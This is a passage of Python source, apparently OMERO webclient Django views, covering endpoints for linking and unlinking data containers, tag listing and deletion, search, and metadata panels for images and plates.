    if parent_type == "orphaned":
        return None
    if parent_type == "experimenter" and child_type in ("dataset", "plate", "tag"):
        # This will be a requested link if a dataset or plate is
        # moved from the de facto orphaned datasets/plates, it isn't
        # an error, but no link actually needs removing
        return None
    # Map the (parent, child) pair onto the OMERO link class name
    link_type = {
        ("project", "dataset"): "ProjectDatasetLink",
        ("dataset", "image"): "DatasetImageLink",
        ("screen", "plate"): "ScreenPlateLink",
        ("tagset", "tag"): "AnnotationAnnotationLink",
    }.get((parent_type, child_type))
    if not link_type:
        raise Http404("json data needs 'parent_type' and 'child_type'")
    params = omero.sys.ParametersI()
    params.addIds(child_ids)
    qs = conn.getQueryService()
    # Need to fetch child and parent, otherwise
    # AnnotationAnnotationLink is not loaded
    q = (
        """
    from %s olink join fetch olink.child join fetch olink.parent
    where olink.child.id in (:ids)
    """
        % link_type
    )
    if parent_id:
        params.add("pid", rlong(parent_id))
        q += " and olink.parent.id = :pid"
    res = qs.findAllByQuery(q, params, conn.SERVICE_OPTS)
    if parent_id is not None and len(res) == 0:
        raise Http404(
            "No link found for %s-%s to %s-%s"
            % (parent_type, parent_id, child_type, child_ids)
        )
    return link_type, res
def create_link(parent_type, parent_id, child_type, child_id):
    """This is just used internally by api_link DELETE below"""
    if parent_type == "experimenter":
        if child_type in ("dataset", "plate"):
            # This is actually not a link that needs creating, this
            # dataset/plate is an orphan
            return "orphan"
    if parent_type == "project":
        parent_obj = ProjectI(long(parent_id), False)
        if child_type == "dataset":
            new_link = ProjectDatasetLinkI()
            new_link.setParent(parent_obj)
            new_link.setChild(DatasetI(long(child_id), False))
            return new_link
    elif parent_type == "dataset":
        parent_obj = DatasetI(long(parent_id), False)
        if child_type == "image":
            new_link = DatasetImageLinkI()
            new_link.setParent(parent_obj)
            new_link.setChild(ImageI(long(child_id), False))
            return new_link
    elif parent_type == "screen":
        parent_obj = ScreenI(long(parent_id), False)
        if child_type == "plate":
            new_link = ScreenPlateLinkI()
            new_link.setParent(parent_obj)
            new_link.setChild(PlateI(long(child_id), False))
            return new_link
    elif parent_type == "tagset":
        if child_type == "tag":
            new_link = AnnotationAnnotationLinkI()
            new_link.setParent(TagAnnotationI(long(parent_id), False))
            new_link.setChild(TagAnnotationI(long(child_id), False))
            return new_link
    # Unsupported parent/child combination
    return None
def get_objects_owners(conn, child_type, child_ids):
    """
    Returns a dict of child_id: owner_id
    """
    # Tags are stored as Annotations
    lookup_type = "Annotation" if child_type == "tag" else child_type
    return {
        obj.id: obj.details.owner.id.val
        for obj in conn.getObjects(lookup_type, child_ids)
    }
@login_required()
def api_links(request, conn=None, **kwargs):
    """
    Entry point for the api_links methods.
    We delegate depending on request method to
    create or delete links between objects.
    """
    if request.method not in ["POST", "DELETE"]:
        return JsonResponse(
            {"Error": "Need to POST or DELETE JSON data to update links"}, status=405
        )
    # Handle link creation/deletion
    try:
        payload = json.loads(request.body)
    except TypeError:
        # for Python 3.5
        payload = json.loads(bytes_to_native_str(request.body))
    handler = _api_links_POST if request.method == "POST" else _api_links_DELETE
    return handler(conn, payload)
def _api_links_POST(conn, json_data, **kwargs):
    """Creates links between objects specified by a json
    blob in the request body.
    e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    When creating a link, fails silently if ValidationException
    (E.g. adding an image to a Dataset that already has that image).
    """
    response = {"success": False}
    # json is [parent_type][parent_id][child_type][childIds]
    # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    linksToSave = []
    # Admins with WriteOwned privilege create links owned by the child's owner
    write_owned = "WriteOwned" in conn.getCurrentAdminPrivileges()
    user_id = conn.getUserId()
    for parent_type, parents in json_data.items():
        # 'orphaned' / 'experimenter' are virtual containers - no real links
        if parent_type in ("orphaned", "experimenter"):
            continue
        for parent_id, children in parents.items():
            for child_type, child_ids in children.items():
                # batch look-up owners of all child objects
                child_owners = get_objects_owners(conn, child_type, child_ids)
                for child_id in child_ids:
                    parent_id = int(parent_id)
                    link = create_link(parent_type, parent_id, child_type, child_id)
                    if link and link != "orphan":
                        # link owner should match child owner
                        if write_owned and child_owners[child_id] != user_id:
                            link.details.owner = ExperimenterI(
                                child_owners[child_id], False
                            )
                        linksToSave.append(link)
    if len(linksToSave) > 0:
        # Need to set context to correct group (E.g parent group)
        # NOTE(review): uses parent_type/parent_id leaked from the last loop
        # iteration - presumably all links share one parent group; confirm
        ptype = parent_type.title()
        if ptype in ["Tagset", "Tag"]:
            ptype = "TagAnnotation"
        try:
            p = conn.getQueryService().get(ptype, parent_id, conn.SERVICE_OPTS)
            conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
        except omero.ValidationException:
            return JsonResponse(
                {"error": "Object of type %s and ID %s not found" % (ptype, parent_id)},
                status=404,
            )
        logger.info("api_link: Saving %s links" % len(linksToSave))
        try:
            # We try to save all at once, for speed.
            conn.saveArray(linksToSave)
            response["success"] = True
        except Exception:
            logger.info(
                "api_link: Exception on saveArray with %s links" % len(linksToSave)
            )
            # If this fails, e.g. ValidationException because link
            # already exists, try to save individual links
            for link in linksToSave:
                try:
                    conn.saveObject(link)
                except Exception:
                    pass
            response["success"] = True
    return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
    """Deletes links between objects specified by a json
    blob in the request body.
    e.g. {"dataset":{"10":{"image":[1,2,3]}}}

    The response echoes back, per parent type, the links that still
    remain for the affected children so the webclient can tell which
    children have become orphans.
    """
    response = {"success": False}
    # json is [parent_type][parent_id][child_type][childIds]
    # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    for parent_type, parents in json_data.items():
        # 'orphaned' is a virtual container - nothing to unlink
        if parent_type == "orphaned":
            continue
        for parent_id, children in parents.items():
            for child_type, child_ids in children.items():
                objLnks = get_object_links(
                    conn, parent_type, parent_id, child_type, child_ids
                )
                if objLnks is None:
                    continue
                linkType, links = objLnks
                linkIds = [r.id.val for r in links]
                logger.info("api_link: Deleting %s links" % len(linkIds))
                conn.deleteObjects(linkType, linkIds, wait=True)
                # webclient needs to know what is orphaned:
                # re-query with parent_id=None to find ALL remaining links
                linkType, remainingLinks = get_object_links(
                    conn, parent_type, None, child_type, child_ids
                )
                # return remaining links in same format as json above
                # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
                for rl in remainingLinks:
                    pid = rl.parent.id.val
                    cid = rl.child.id.val
                    # Deleting links still in progress above - ignore these
                    if pid == int(parent_id):
                        continue
                    if parent_type not in response:
                        response[parent_type] = {}
                    if pid not in response[parent_type]:
                        response[parent_type][pid] = {child_type: []}
                    response[parent_type][pid][child_type].append(cid)
    # If we got here, DELETE was OK
    response["success"] = True
    return JsonResponse(response)
@login_required()
def api_parent_links(request, conn=None, **kwargs):
    """
    Get a list of links as
    {'data': [{id: 12, child:{type:'image', id:1},
    parent:{type:'dataset', id:2}] }
    Supports ?image=1,2 and ?image=1&image=2
    """
    parent_types = {"image": "dataset", "dataset": "project", "plate": "screen"}
    data = []
    for child_type, parent_type in parent_types.items():
        raw_ids = request.GET.getlist(child_type)
        if len(raw_ids) == 0:
            continue
        # each query value may itself be comma-separated, e.g. ?image=1,2
        child_ids = [i for value in raw_ids for i in value.split(",")]
        link_type, links = get_object_links(
            conn, parent_type, None, child_type, child_ids
        )
        for lnk in links:
            data.append(
                {
                    "id": lnk.id.val,
                    "parent": {"type": parent_type, "id": lnk.parent.id.val},
                    "child": {"type": child_type, "id": lnk.child.id.val},
                }
            )
    return JsonResponse({"data": data})
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
    """
    This finds the paths to objects in the hierarchy. It returns only
    the path, not the object hierarchy itself.
    An example usage is for the 'show' functionality
    Example to go to the image with id 1 somewhere in the tree.
    http://localhost:8000/webclient/?show=image-1
    This method can tell the webclient exactly what needs to be
    dynamically loaded to display this in the jstree.
    """
    try:
        ids = {
            name: get_long_or_default(request, name, None)
            for name in (
                "experimenter",
                "project",
                "dataset",
                "image",
                "screen",
                "plate",
                "run",
                "tag",
                "tagset",
                "roi",
                "shape",
                "group",
            )
        }
        # 'acquisition' will override 'run' if both are specified as they
        # are the same thing
        acquisition_id = get_long_or_default(request, "acquisition", ids["run"])
        well_id = request.GET.get("well", None)  # kept as a raw string
        page_size = get_long_or_default(request, "page_size", settings.PAGE)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if ids["tag"] is not None or ids["tagset"] is not None:
        paths = paths_to_tag(conn, ids["experimenter"], ids["tagset"], ids["tag"])
    else:
        paths = paths_to_object(
            conn,
            ids["experimenter"],
            ids["project"],
            ids["dataset"],
            ids["image"],
            ids["screen"],
            ids["plate"],
            acquisition_id,
            well_id,
            ids["group"],
            page_size,
            ids["roi"],
            ids["shape"],
        )
    return JsonResponse({"paths": paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
    """Dispatch by HTTP method: GET lists tags, DELETE removes them."""
    handlers = {
        "GET": api_tags_and_tagged_list_GET,
        "DELETE": api_tags_and_tagged_list_DELETE,
    }
    handler = handlers.get(request.method)
    if handler is not None:
        return handler(request, conn, **kwargs)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
    """Get a list of tags.

    Specifying tag_id will return any sub-tags, sub-tagsets and
    objects tagged with that id.
    If no tagset_id is specified it will return tags which have no
    parent.
    """
    # Read paging / filter parameters from the query string
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        tag_id = get_long_or_default(request, "id", None)
        experimenter_id = get_long_or_default(request, "experimenter_id", -1)
        orphaned = get_bool_or_default(request, "orphaned", False)
        load_pixels = get_bool_or_default(request, "sizeXYZ", False)
        date = get_bool_or_default(request, "date", False)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        if tag_id is not None:
            # Start from ALL data (all owners) tagged with the given tag
            result = tree.marshal_tagged(
                conn=conn,
                experimenter_id=experimenter_id,
                tag_id=tag_id,
                group_id=group_id,
                page=page,
                load_pixels=load_pixels,
                date=date,
                limit=limit,
            )
        else:
            result = {}
        # Add the 'tags' under tag_id (or top-level tags if no id given)
        result["tags"] = tree.marshal_tags(
            conn=conn,
            orphaned=orphaned,
            experimenter_id=experimenter_id,
            tag_id=tag_id,
            group_id=group_id,
            page=page,
            limit=limit,
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(result)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
    """Delete the listed tags by ids.

    Reads the tag ids from ?id=... query parameters, batches the deletes
    into a single server-side DoAll request, and waits for completion.
    Returns an empty JSON string on success, or an error response.
    """
    # Get parameters
    try:
        tag_ids = get_longs(request, "id")
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    dcs = list()
    handle = None
    try:
        # Batch all the deletes into one DoAll command
        for tag_id in tag_ids:
            dcs.append(omero.cmd.Delete("/Annotation", tag_id))
        doall = omero.cmd.DoAll()
        doall.requests = dcs
        handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
        try:
            conn._waitOnCmd(handle)
        finally:
            # Always release the server-side handle
            handle.close()
    except CmdError as e:
        return HttpResponseBadRequest(e.message)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    # Fix: Django's JsonResponse only accepts non-dict payloads with
    # safe=False; JsonResponse("") raised TypeError, turning every
    # successful delete into a 500 error.
    return JsonResponse("", safe=False)
@login_required()
def api_annotations(request, conn=None, **kwargs):
    """Marshal annotations (and their authors) for the objects named in
    the query string, e.g. ?image=1,2&dataset=3."""
    params = request.GET
    page = get_long_or_default(request, "page", 1)
    limit = get_long_or_default(request, "limit", ANNOTATIONS_LIMIT)
    anns, exps = tree.marshal_annotations(
        conn,
        project_ids=get_list(request, "project"),
        dataset_ids=get_list(request, "dataset"),
        image_ids=get_list(request, "image"),
        screen_ids=get_list(request, "screen"),
        plate_ids=get_list(request, "plate"),
        run_ids=get_list(request, "acquisition"),
        well_ids=get_list(request, "well"),
        ann_type=params.get("type", None),
        ns=params.get("ns", None),
        page=page,
        limit=limit,
    )
    return JsonResponse({"annotations": anns, "experimenters": exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
    """Return shares and discussions as JSON, filtered by member/owner."""
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        member_id = get_long_or_default(request, "member_id", -1)
        owner_id = get_long_or_default(request, "owner_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # Like with api_container_list, this is a combination of
    # results which will each be able to return up to the limit in page
    # size
    filters = dict(member_id=member_id, owner_id=owner_id, page=page, limit=limit)
    try:
        shares = tree.marshal_shares(conn=conn, **filters)
        discussions = tree.marshal_discussions(conn=conn, **filters)
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"shares": shares, "discussions": discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
    """
    This loads data for the center panel, via AJAX calls.
    Used for Datasets, Plates & Orphaned Images.

    o1_type/o1_id identify the container ('plate' or 'acquisition');
    with neither set, an empty manager is created.
    """
    # get index of the plate (field index within each well)
    index = getIntOrDefault(request, "index", 0)
    # prepare data. E.g. kw = {} or {'plate': 301L} or
    # 'acquisition': 301L}
    kw = dict()
    if o1_type is not None:
        if o1_id is not None and int(o1_id) > 0:
            kw[str(o1_type)] = long(o1_id)
    try:
        manager = BaseContainer(conn, **kw)
    except AttributeError as x:
        return handlerInternalError(request, x)
    # prepare forms
    form_well_index = None
    context = {"manager": manager, "form_well_index": form_well_index, "index": index}
    # load data & template
    template = None
    if "plate" in kw or "acquisition" in kw:
        # fields is used as the 'range' of the well-index form and indexed
        # at [0]; presumably a (min, max) pair - confirm against manager
        fields = manager.getNumberOfFields()
        if fields is not None:
            form_well_index = WellIndexForm(initial={"index": index, "range": fields})
            if index == 0:
                index = fields[0]
        # Show parameter will be well-1|well-2
        show = request.GET.get("show")
        if show is not None:
            wells_to_select = []
            for w in show.split("|"):
                if "well-" in w:
                    wells_to_select.append(w.replace("well-", ""))
            context["select_wells"] = ",".join(wells_to_select)
        context["baseurl"] = reverse("webgateway").rstrip("/")
        context["form_well_index"] = form_well_index
        context["index"] = index
        context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
        template = "webclient/data/plate.html"
        if o1_type == "acquisition":
            context["acquisition"] = o1_id
    context["isLeader"] = conn.isLeader()
    context["template"] = template
    return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
    """
    Get the potential groups we can move selected data to.
    These will be groups that the owner(s) of selected objects is a member of.
    Objects are specified by query string like: ?Image=1,2&Dataset=3
    If no selected objects are specified, simply list the groups that the
    current user is a member of.
    Groups list will exclude the 'current' group context.
    """
    ownerIds = []
    currentGroups = set()
    groupSets = []
    groups = {}
    owners = {}
    # Collect the owners and current groups of all the selected objects
    for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
        oids = request.GET.get(dtype, None)
        if oids is not None:
            for o in conn.getObjects(dtype, oids.split(",")):
                ownerIds.append(o.getDetails().owner.id.val)
                currentGroups.add(o.getDetails().group.id.val)
    ownerIds = list(set(ownerIds))
    # In case we were passed no objects or they weren't found
    if len(ownerIds) == 0:
        ownerIds = [conn.getUserId()]
    for owner in conn.getObjects(
        "Experimenter", ownerIds, opts={"load_experimentergroups": True}
    ):
        # Each owner has a set of groups
        gids = []
        owners[owner.id] = owner.getFullName()
        for group in owner.copyGroupExperimenterMap():
            groups[group.parent.id.val] = group.parent
            gids.append(group.parent.id.val)
        groupSets.append(set(gids))
    # Can move to groups that all owners are members of...
    targetGroupIds = set.intersection(*groupSets)
    # ...but not 'user' group
    userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
    if userGroupId in targetGroupIds:
        targetGroupIds.remove(userGroupId)
    # if all the Objects are in a single group, exclude it from the target
    # groups
    if len(currentGroups) == 1:
        curr_grp = currentGroups.pop()
        if curr_grp in targetGroupIds:
            targetGroupIds.remove(curr_grp)

    def getPerms(group):
        # Summarise a group's permissions for the JSON response
        p = group.getDetails().permissions
        return {
            "write": p.isGroupWrite(),
            "annotate": p.isGroupAnnotate(),
            "read": p.isGroupRead(),
        }

    # From groupIds, create a list of group dicts for json
    targetGroups = []
    for gid in targetGroupIds:
        targetGroups.append(
            {"id": gid, "name": groups[gid].name.val, "perms": getPerms(groups[gid])}
        )
    targetGroups.sort(key=lambda x: x["name"])
    owners = [[k, v] for k, v in owners.items()]
    return {"owners": owners, "groups": targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
    """Loads a tree for user to pick target Project, Dataset or Screen"""
    # filter the query by the destination group (not switching group)
    conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
    owner = getIntOrDefault(request, "owner", None)
    manager = BaseContainer(conn)
    manager.listContainerHierarchy(owner)
    return {
        "manager": manager,
        "target_type": target_type,
        "template": "webclient/data/chgrp_target_tree.html",
    }
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
    """
    Handles AJAX calls to search.

    When form is None, simply renders the search home page; otherwise
    runs the query from request.GET and, if the query is purely numeric,
    additionally looks objects up by ID.
    """
    manager = BaseSearch(conn)
    foundById = []
    # form = 'form' if we are searching. Get query from request...
    r = request.GET
    if form is not None:
        query_search = r.get("query", None)
        if query_search is None:
            return HttpResponse("No search '?query' included")
        query_search = query_search.replace("+", " ")
        advanced = toBoolean(r.get("advanced"))
        # If this is an advanced search use 'advanced_search' for query
        if advanced:
            query_search = r.get("advanced_search")
        template = "webclient/search/search_details.html"
        onlyTypes = r.getlist("datatype")
        fields = r.getlist("field")
        searchGroup = r.get("searchGroup", None)
        ownedBy = r.get("ownedBy", None)
        useAcquisitionDate = toBoolean(r.get("useAcquisitionDate"))
        startdate = r.get("startdateinput", None)
        startdate = startdate is not None and smart_str(startdate) or None
        enddate = r.get("enddateinput", None)
        enddate = enddate is not None and smart_str(enddate) or None
        date = None
        if startdate is not None:
            # An open-ended range ends today
            if enddate is None:
                n = datetime.datetime.now()
                enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
            date = "%s_%s" % (startdate, enddate)
        # by default, if user has not specified any types:
        if len(onlyTypes) == 0:
            onlyTypes = ["images"]
        # search is carried out and results are stored in
        # manager.containers.images etc.
        manager.search(
            query_search,
            onlyTypes,
            fields,
            searchGroup,
            ownedBy,
            useAcquisitionDate,
            date,
            rawQuery=advanced,
        )
        # if the query is only numbers (separated by commas or spaces)
        # we search for objects by ID
        isIds = re.compile(r"^[\d ,]+$")
        if isIds.search(query_search) is not None:
            # search across all groups
            conn.SERVICE_OPTS.setOmeroGroup(-1)
            idSet = set()
            for queryId in re.split(" |,", query_search):
                if len(queryId) == 0:
                    continue
                try:
                    searchById = long(queryId)
                    # skip duplicate IDs in the query
                    if searchById in idSet:
                        continue
                    idSet.add(searchById)
                    for t in onlyTypes:
                        t = t[0:-1]  # remove 's'
                        if t in (
                            "project",
                            "dataset",
                            "image",
                            "screen",
                            "plate",
                            "well",
                        ):
                            obj = conn.getObject(t, searchById)
                            if obj is not None:
                                foundById.append({"otype": t, "obj": obj})
                except ValueError:
                    pass
    else:
        # simply display the search home page.
        template = "webclient/search/search.html"
    context = {
        "manager": manager,
        "foundById": foundById,
        "resultCount": manager.c_size + len(foundById),
    }
    context["template"] = template
    context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None, **kwargs):
    """
    This page is the right-hand panel 'general metadata', first tab only.
    Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
    The data and annotations are loaded by the manager. Display of appropriate
    data is handled by the template.
    """
    # the index of a field within a well
    index = getIntOrDefault(request, "index", 0)
    context = dict()
    # we only expect a single object, but forms can take multiple objects
    # (each list is either [the object] or empty, depending on c_type)
    images = c_type == "image" and list(conn.getObjects("Image", [c_id])) or list()
    datasets = (
        c_type == "dataset" and list(conn.getObjects("Dataset", [c_id])) or list()
    )
    projects = (
        c_type == "project" and list(conn.getObjects("Project", [c_id])) or list()
    )
    screens = c_type == "screen" and list(conn.getObjects("Screen", [c_id])) or list()
    plates = c_type == "plate" and list(conn.getObjects("Plate", [c_id])) or list()
    acquisitions = (
        c_type == "acquisition"
        and list(conn.getObjects("PlateAcquisition", [c_id]))
        or list()
    )
    shares = (
        (c_type == "share" or c_type == "discussion")
        and [conn.getShare(c_id)]
        or list()
    )
    wells = c_type == "well" and list(conn.getObjects("Well", [c_id])) or list()
    # we simply set up the annotation form, passing the objects to be
    # annotated.
    selected = {
        "images": c_type == "image" and [c_id] or [],
        "datasets": c_type == "dataset" and [c_id] or [],
        "projects": c_type == "project" and [c_id] or [],
        "screens": c_type == "screen" and [c_id] or [],
        "plates": c_type == "plate" and [c_id] or [],
        "acquisitions": c_type == "acquisition" and [c_id] or [],
        "wells": c_type == "well" and [c_id] or [],
        "shares": ((c_type == "share" or c_type == "discussion") and [c_id] or []),
    }
    initial = {
        "selected": selected,
        "images": images,
        "datasets": datasets,
        "projects": projects,
        "screens": screens,
        "plates": plates,
        "acquisitions": acquisitions,
        "wells": wells,
        "shares": shares,
    }
    form_comment = None
    figScripts = None
    if c_type in ("share", "discussion"):
        # Shares/discussions get a comment form instead of the general tab
        template = "webclient/annotations/annotations_share.html"
        manager = BaseShare(conn, c_id)
        manager.getAllUsers(c_id)
        manager.getComments(c_id)
        form_comment = CommentAnnotationForm(initial=initial)
    else:
        try:
            manager = BaseContainer(conn, **{str(c_type): long(c_id), "index": index})
        except AttributeError as x:
            return handlerInternalError(request, x)
        if share_id is not None:
            # viewing an object within a share
            template = "webclient/annotations/annotations_share.html"
            context["share"] = BaseShare(conn, share_id)
        else:
            template = "webclient/annotations/metadata_general.html"
            context["canExportAsJpg"] = manager.canExportAsJpg(request)
            context["annotationCounts"] = manager.getAnnotationCounts()
            figScripts = manager.listFigureScripts()
    context["manager"] = manager
    if c_type in ("tag", "tagset"):
        context["insight_ns"] = omero.rtypes.rstring(
            omero.constants.metadata.NSINSIGHTTAGSET
        ).val
    if form_comment is not None:
        context["form_comment"] = form_comment
    context["figScripts"] = figScripts
    context["template"] = template
    context["webclient_path"] = reverse("webindex")
    return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None, **kwargs):
    """
    This is the image 'Preview' tab for the right-hand panel.

    Loads all rendering definitions for the image (one per user, keeping
    the highest-ID rdef when a user has duplicates) and serialises them
    into the webgateway rdef query-string format for the template.
    """
    context = {}
    # the index of a field within a well
    index = getIntOrDefault(request, "index", 0)
    manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    if share_id:
        context["share"] = BaseShare(conn, share_id)
    if c_type == "well":
        # For wells, preview the image of the selected field
        manager.image = manager.well.getImage(index)
    allRdefs = manager.image.getAllRenderingDefs()
    rdefs = {}
    rdefId = manager.image.getRenderingDefId()
    # remove duplicates per user
    for r in allRdefs:
        ownerId = r["owner"]["id"]
        r["current"] = r["id"] == rdefId
        # if duplicate rdefs for user, pick one with highest ID
        if ownerId not in rdefs or rdefs[ownerId]["id"] < r["id"]:
            rdefs[ownerId] = r
    rdefs = rdefs.values()
    # format into rdef strings,
    # E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
    rdefQueries = []
    for r in rdefs:
        chs = []
        for i, c in enumerate(r["c"]):
            # "-" prefix marks an inactive channel
            act = "-"
            if c["active"]:
                act = ""
            color = c["lut"] if "lut" in c else c["color"]
            reverse = "r" if c["inverted"] else "-r"
            chs.append(
                "%s%s|%s:%s%s$%s" % (act, i + 1, c["start"], c["end"], reverse, color)
            )
        rdefQueries.append(
            {
                "id": r["id"],
                "owner": escape(r["owner"]),  # May be used unsafe later
                "c": ",".join(chs),
                "m": r["model"] == "greyscale" and "g" or "c",
            }
        )
    # Flag images too big to render as a single plane
    max_w, max_h = conn.getMaxPlaneSize()
    size_x = manager.image.getSizeX()
    size_y = manager.image.getSizeY()
    context["tiledImage"] = (size_x * size_y) > (max_w * max_h)
    context["manager"] = manager
    context["rdefsJson"] = json.dumps(rdefQueries)
    context["rdefs"] = rdefs
    context["template"] = "webclient/annotations/metadata_preview.html"
    return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
    """
    Load the ancestors of the specified object for display in a static tree.

    Called via AJAX from the metadata_general panel.
    """
    container_kwargs = {str(c_type): long(c_id)}
    return {
        "manager": BaseContainer(conn, **container_kwargs),
        "template": "webclient/annotations/metadata_hierarchy.html",
    }
@login_required()
@render_response()
def load_metadata_acquisition(
    request, c_type, c_id, conn=None, share_id=None, **kwargs
):
    """
    The acquisition tab of the right-hand panel. Only loaded for images.
    TODO: urls regex should make sure that c_type is only 'image' OR 'well'

    Builds read-only metadata forms for channels, objective, microscope,
    filters, dichroics, detectors and light sources. When viewing within
    a share (share_id set) most instrument metadata is omitted (see 9853).
    """
    try:
        if c_type in ("share", "discussion"):
            template = "webclient/annotations/annotations_share.html"
            manager = BaseShare(conn, c_id)
            manager.getAllUsers(c_id)
            manager.getComments(c_id)
        else:
            template = "webclient/annotations/metadata_acquisition.html"
            manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    except AttributeError as x:
        return handlerInternalError(request, x)
    form_environment = None
    form_objective = None
    form_microscope = None
    form_instrument_objectives = list()
    form_stageLabel = None
    form_filters = list()
    form_dichroics = list()
    form_detectors = list()
    form_channels = list()
    form_lasers = list()
    # Light-source type enums are always needed for channel/laser forms
    lasertypes = list(conn.getEnumerationEntries("LaserType"))
    arctypes = list(conn.getEnumerationEntries("ArcType"))
    filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
    # various enums we need for the forms (don't load unless needed)
    mediums = None
    immersions = None
    corrections = None
    if c_type == "image":
        if share_id is None:
            manager.companionFiles()
        manager.channelMetadata()
        # One form (plus optional sub-forms) per channel
        for theC, ch in enumerate(manager.channel_metadata):
            logicalChannel = ch.getLogicalChannel()
            if logicalChannel is not None:
                channel = dict()
                channel["form"] = MetadataChannelForm(
                    initial={
                        "logicalChannel": logicalChannel,
                        "exWave": ch.getExcitationWave(units=True),
                        "emWave": ch.getEmissionWave(units=True),
                        "illuminations": list(
                            conn.getEnumerationEntries("IlluminationI")
                        ),
                        "contrastMethods": list(
                            conn.getEnumerationEntries("ContrastMethodI")
                        ),
                        "modes": list(conn.getEnumerationEntries("AcquisitionModeI")),
                    },
                    auto_id=False,
                )
                # 9853 Much metadata is not available to 'shares'
                if share_id is None:
                    lightPath = logicalChannel.getLightPath()
                    if lightPath is not None:
                        channel["form_dichroic"] = None
                        channel["form_excitation_filters"] = list()
                        channel["form_emission_filters"] = list()
                        lightPathDichroic = lightPath.getDichroic()
                        if lightPathDichroic is not None:
                            channel["form_dichroic"] = MetadataDichroicForm(
                                initial={"dichroic": lightPathDichroic}
                            )
                        filterTypes = list(conn.getEnumerationEntries("FilterTypeI"))
                        for f in lightPath.getEmissionFilters():
                            channel["form_emission_filters"].append(
                                MetadataFilterForm(
                                    initial={"filter": f, "types": filterTypes}
                                )
                            )
                        for f in lightPath.getExcitationFilters():
                            channel["form_excitation_filters"].append(
                                MetadataFilterForm(
                                    initial={"filter": f, "types": filterTypes}
                                )
                            )
                    detectorSettings = logicalChannel.getDetectorSettings()
                    if (
                        detectorSettings._obj is not None
                        and detectorSettings.getDetector()
                    ):
                        channel["form_detector_settings"] = MetadataDetectorForm(
                            initial={
                                "detectorSettings": detectorSettings,
                                "detector": detectorSettings.getDetector(),
                                "types": list(
                                    conn.getEnumerationEntries("DetectorTypeI")
                                ),
                                "binnings": list(conn.getEnumerationEntries("Binning")),
                            }
                        )
                    lightSourceSettings = logicalChannel.getLightSourceSettings()
                    if (
                        lightSourceSettings is not None
                        and lightSourceSettings._obj is not None
                    ):
                        lightSrc = lightSourceSettings.getLightSource()
                        if lightSrc is not None:
                            # Pick the type-enum list matching the source class
                            lstypes = lasertypes
                            if lightSrc.OMERO_CLASS == "Arc":
                                lstypes = arctypes
                            elif lightSrc.OMERO_CLASS == "Filament":
                                lstypes = filamenttypes
                            channel["form_light_source"] = MetadataLightSourceForm(
                                initial={
                                    "lightSource": lightSrc,
                                    "lightSourceSettings": lightSourceSettings,
                                    "lstypes": lstypes,
                                    "mediums": list(
                                        conn.getEnumerationEntries("LaserMediumI")
                                    ),
                                    "pulses": list(
                                        conn.getEnumerationEntries("PulseI")
                                    ),
                                }
                            )
                # TODO: We don't display filter sets here yet since they are
                # not populated on Import by BioFormats.
                channel["label"] = ch.getLabel()
                color = ch.getColor()
                channel["color"] = color is not None and color.getHtml() or None
                planeInfo = (
                    manager.image
                    and manager.image.getPrimaryPixels().copyPlaneInfo(
                        theC=theC, theZ=0
                    )
                )
                plane_info = []
                # Collect timing info per plane; skip planes with neither value
                for pi in planeInfo:
                    deltaT = pi.getDeltaT(units="SECOND")
                    exposure = pi.getExposureTime(units="SECOND")
                    if deltaT is None and exposure is None:
                        continue
                    if deltaT is not None:
                        deltaT = deltaT.getValue()
                    if exposure is not None:
                        exposure = exposure.getValue()
                    plane_info.append(
                        {"theT": pi.theT, "deltaT": deltaT, "exposureTime": exposure}
                    )
                channel["plane_info"] = plane_info
                form_channels.append(channel)
        # Wells expose their image via the well sample
        try:
            image = manager.well.getWellSample().image()
        except Exception:
            image = manager.image
        if share_id is None:  # 9853
